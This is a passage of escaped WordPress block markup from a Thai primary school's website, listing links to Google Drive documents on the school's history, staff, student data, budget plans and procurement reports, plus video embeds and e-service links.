data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8396d5-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8396d5-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-544\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c44218-61\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c44218-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-538\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 